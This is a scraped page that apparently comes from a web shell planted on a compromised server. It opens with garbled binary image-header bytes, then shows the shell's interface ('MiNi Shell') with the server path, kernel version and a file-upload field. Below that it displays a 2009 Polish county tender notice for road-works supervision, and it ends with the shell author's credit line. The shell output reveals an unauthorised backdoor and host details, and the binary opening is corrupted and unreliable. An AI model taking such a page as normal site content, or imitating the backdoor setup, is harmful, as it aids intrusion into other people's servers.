JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/133890-N-2009.html

<p class="kh_header"><b>Zgierz: Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Przebudowa ul. Łagiewnickiej
i ul. Chełmskiej w Zgierzu oraz nad zadaniem pn. Wykonanie nakładki na drodze powiatowej 
Nr 5135 E w m. Sanie, gm. Aleksandrów Łódzki- 2 zadania</b><br>
<b>Numer ogłoszenia: 133890 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Zgierskiego , ul. Sadowa 6A, 95-100 Zgierz, woj. łódzkie, tel. 042 7190885, faks 042 7190816.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Przebudowa ul. Łagiewnickiej
i ul. Chełmskiej w Zgierzu oraz nad zadaniem pn. Wykonanie nakładki na drodze powiatowej 
Nr 5135 E w m. Sanie, gm. Aleksandrów Łódzki- 2 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru nad przebudową
 ul. Łagiewnickiej i ul. Chełmskiej w Zgierzu oraz wykonaniem nakładki na drodze powiatowej Nr 5135 E w m. Sanie, gm. Aleksandrów Łódzki.

Zamawiający dopuszcza składanie ofert częściowych,
Zadanie 1
Temat: Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Przebudowa ul. Łagiewnickiej i ul. Chełmskiej w Zgierzu. 

Zadanie Nr 2	
Temat: Pełnienie funkcji inspektora nadzoru nad zadanie pn. Wykonanie nakładki na drodze powiatowej Nr 5135 E w m. Sanie, gm. Aleksandrów Łódzki.
 
Części nie mogą być dzielone przez Wykonawców, oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w zadaniu częściowym zostaną odrzucone.

Zamawiający informuje, że nie dopuszcza możliwości składania ofert wariantowych, nie zawiera umowy ramowej i nie ustanawia dynamicznego systemu zakupów, nie stosuje aukcji elektronicznej oraz nie przewiduje możliwości udzielenia zamówienia uzupełniającego.
Zamawiający nie żąda wniesienia wadium..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie 
art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z późn. zm.), spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych. 
Wykonawcy biorący udział w postępowaniu muszą spełnić następujące warunki:
1	Sytuacja podmiotowa wykonawcy
Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych
2	Zdolność techniczna
Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana metodą spełnia/niespełna na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń składających się na ofertę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy dołączyć następujące dokumenty i oświadczenia:

1	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert	
2	Wykaz osób uczestniczących 
w wykonywaniu zamówienia którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.	Wymagane dysponowanie osobami: które będą wykonywać zamówienie, posiadającymi uprawnienia do nadzorowania i kierowania robotami budowlanymi w specjalności konstrukcyjno-inżynieryjnej w zakresie budowy dróg - minimum 1 osoba; Do wykazu należy załączyć dokumenty stwierdzające, że wskazane przez Wykonawcę osoby, które będą uczestniczyć 
w wykonywaniu zamówienia, posiadają uprawnienia budowlane  - drogowe w specjalności konstrukcyjno - inżynieryjnej w zakresie budowy dróg (zgodnie z art. 12 ust. 1 i 2 ustawy - Prawo budowlane) oraz aktualne zaświadczenie 
o przynależności tych osób do Okręgowej Izby Inżynierów Budowlanych.
	
3	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób uczestniczących w wykonywaniu zamówienia wykonawca wskazał osoby, którymi będzie dysponował	 
4	Oświadczenie z art. 22 i 24		
5 Oświadczenie w którym Wykonawca określi zakres usług zlecanych ewentualnym podwykonawcom 	

Wskazane dokumenty mogą być doręczone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów.
Jeżeli w określonym terminie Wykonawca nie złoży oświadczeń lub dokumentów, 
o których mowa w art. 25 ust. 1 ustawy Prawo Zamówień Publicznych, lub pełnomocnictw albo jeżeli złoży oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy Prawo Zamówień Publicznych, zawierające błędy lub wadliwe pełnomocnictwa, Zamawiający wezwie go do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy będzie podlegać odrzuceniu albo konieczne będzie unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny spełniać warunki określone w art. 26 ust. 3 art. ustawy Prawo Zamówień Publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z późn. zm.). Zamawiający może także w wyznaczonym przez siebie terminie, wezwać do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaję się dokumentów, o których mowa w pkt 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Szczegółowe wymagania formalne, jakie powinny spełniać dokumenty, o których mowa w pkt 1 zostały określone w rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006r. 
w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, 
w jakich te dokumenty mogą być składane.
Kryterium oceny ofert  
W trakcie wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium: cena 100%.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.starostwo.zgierz.pl/przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ(4,80+ 5,80 koszty wysyłki) można odebrać w siedzibie Zamawiającego 
w godzinach od 8:00-16:00 pok. 318 lub za zaliczeniem pocztowym nr faksu dla zamówienia SIWZ 0-42 717-54-84..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 10:00, miejsce: Oferty należy składać w Starostwie Powiatowym w Zgierzu; 95-100 Zgierz, ul. Sadowa 6Aw pok. 112 - Kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Przebudowa ul. Łagiewnickiej i ul. Chełmskiej w Zgierzu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis: Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru nad przebudową ul. Łagiewnickiej i ul. Chełmskiej w Zgierzu
Charakterystyka nadzorowanej inwestycji:
1)	rozebranie krawężników i ustawienie krawężników betonowych na długości 1370 m,
2)	rozebranie nawierzchni z płyt chodnikowych na powierzchni 120 m2,
3)	wykonanie i wyprofilowanie koryta pod warstwy konstrukcyjne, na powierzchni 1760 m2, w ulice dochodzące do ul. Łagiewnickiej 
i ul. Chełmskiej w Zgierzu,
4)	oczyszczenie i skropienie warstw konstrukcyjnych nawierzchni na powierzchni 15679 m2 na ul. Chełmskiej odc. od ul. Łagiewnickiej do 
ul. Letniej i na ul. Łagiewnickiej odc. od ul. Chełmskiej do ul. Długiej 
w Zgierzu,
5)	wykonaniu wyrównania poprzecznego i podłużnego podbudowy mieszankami mineralno -asfaltowymi, średnia grubość warstwy wyrównawczej 5 cm na ul. Chełmskiej odc. od ul. Łagiewnickiej do ul. Letniej i na Łagiewnickiej odc. od ul. Chełmskiej do ul. Długiej w Zgierzu,
6)	wykonanie warstw konstrukcji nawierzchni z betonu asfaltowego na powierzchni 2950 m2 w pasie drogowym ul. Łagiewnickiej i ul. Chełmskiej 
w Zgierzu,
7)	wykonanie wysepek przystankowych z kostki betonowej, kolorowej gr. 6 cm na podsypce piaskowej z wypełnieniem spoin piaskiem, na powierzchni 120 m2 na ul. Chełmskiej odc. od ul. Łagiewnickiej do ul. Letniej i na Łagiewnickiej odc. od ul. Chełmskiej do ul. Długiej w Zgierzu.
Szczegółowe wymagania dotyczące realizacji inwestycji. zawarte są w:
Ogólnych Specyfikacjach Technicznych 
a)	D - M - 00.00.00Wymagania ogólne,
b)	D-04.03.01Oczyszczenie  i  skropienie warstw  konstrukcyjnych,
c)	D-04.01.01 Koryto  wraz  z  profilowaniem i  zagęszczaniem  podłoża,
d)	D-01.02.04Rozbiórka elementów dróg, ogrodzeń i przepustów,
e)	D - 04.08.00Wyrównanie podbudowy,
f)	D - 08.03.01Betonowe  obrzeża  chodnikowe,
g)	D - 04.04.00¸ 04.04.03Podbudowy  z  kruszywa stabilizowanego  mechanicznie,
h)	D - 08.04.01Wjazdy  i  wyjazdy  z  bram,
i)	D-08.01.01Krawężniki betonowe,
j)	D-05.03.05.Nawierzchnia z betonu asfaltowego.

Szczegółowych Specyfikacjach Technicznych:
a)	D-01.02.04Rozbiórka elementów dróg,
b)	D-08.01.01Krawężniki betonowe, 
c)	D-L-04.01.01Koryto wraz z profilowaniem i zagęszczaniem podłoża,
d)	D-04.04.02Podbudowa z kruszywa łamanego stabilizowanego mechanicznie,
e)	 D-04.03.01Oczyszczanie i skropienie warstw konstrukcyjnych,
f)	D-04.08.01Wyrównanie podbudowy mieszankami mineralno asfaltowymi,
g)	D-05.03.05 Nawierzchnia z betonu asfaltowego,
h)	D-08.03.01Betonowe obrzeża chodnikowe,
i)	D-08.04.01Wysepki przystankowe.

Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi.
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
Zakres podstawowych obowiązków i praw inspektora nadzoru wynika z art. 25
 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. 
Z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
1)	reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową
 i pozwoleniem budowlanym, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
2)	uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
3)	sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
4)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
5)	przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział w czynnościach odbioru robót,
6)	potwierdzanie ilości wykonanych robót,
7)	potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
8)	sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
9)	uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
10)	inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
Zamawiający wymaga, aby Wykonawca był przedsiębiorcą w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.

Zamówienie musi zostać zrealizowane w terminie:
Od dnia rozpoczęcia robót budowlanych przez Wykonawcę robót budowlany.	
Do dnia zakończenia i odbioru wszystkich robót objętych przedmiotem zamówienia oraz przekazania do użytkowania nadzorowanych inwestycji oraz w okresie trwania gwarancji tj. 
24 miesiące licząc od dnia następującego po dniu ostatecznego odbioru ostatniej oddanej do odbioru roboty budowlanej objętej nadzorem inwestorskim.
. - dla zadania częściowego: 1
Z uwagi na problemy techniczne w pkt 4) podany został termin zakończenia nadzorowanej inwestycji..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadanie pn.Wykonanie nakładki na drodze powiatowej Nr 5135 E w m. Sanie, gm. Aleksandrów Łódzki..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis: Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru nad wykonaniem nakładki na drodze powiatowej Nr 5135 E w m. Sanie, gm. Aleksandrów Łódzki, -  odcinek 0,35 km (na wysokości OSP Sanie).
Wymagania szczegółowe dotyczące wykonania i odbioru robót inwestycji zawarte są w: 
Ogólnych Specyfikacjach Technicznych (OST)
a)	D -00.00.00. Wymagania ogólne, 
b)	D -01.00.00. Roboty przygotowawcze, 
c)	D 04.08.00 Wyrównanie podbudowy,
d)	Krawężniki, 
e)	D -04.03.01. Oczyszczenie i skropienie warstw konstrukcyjnych, 
f)	D 05.03.05 Nawierzchnia z betonu asfaltowego, 

Szczegółowych Specyfikacjach Technicznych (SST) 
a)	D-01.01.01 Odtworzenie trasy i punktów wysokościowych, 
b)	D-08.01.01 Krawężniki betonowe, 
c)	D-04.08.01 Wyrównanie podbudowy mieszankami mineralno - asfaltowymi, 
d)	D-04.03.01 Oczyszczenie i skropienie warstw konstrukcyjnych
e)	D-05.03.05 Nawierzchnia z betonu asfaltowego. 

Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi.
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
Zakres podstawowych obowiązków i praw inspektora nadzoru wynika 
z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane 
(tj. Dz.U. Z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
1)	reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową 
i pozwoleniem budowlanym, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
2)	uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów 
3)	urządzeń, zgłaszanych przez wykonawcę robót, szczególnie 
w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
4)	sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
5)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
6)	przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział w czynnościach odbioru robót,
7)	potwierdzanie ilości wykonanych robót,
8)	potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
9)	sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
10)	uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
11)	inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
Zamawiający wymaga, aby Wykonawca był przedsiębiorcą w rozumieniu przepisów ustawy  z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
Zamówienie musi zostać zrealizowane w terminie:
Od dnia rozpoczęcia robót budowlanych przez Wykonawcę robót budowlany.	
Do dnia zakończenia i odbioru wszystkich robót objętych przedmiotem zamówienia oraz przekazania do użytkowania nadzorowanych inwestycji oraz w okresie trwania gwarancji tj. 
24 miesiące licząc od dnia następującego po dniu ostatecznego odbioru ostatniej oddanej do odbioru roboty budowlanej objętej nadzorem inwestorskim.
Z uwagi na problemy techniczne w pkt 4) podany został termin zakończenia nadzorowanej inwestycji..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com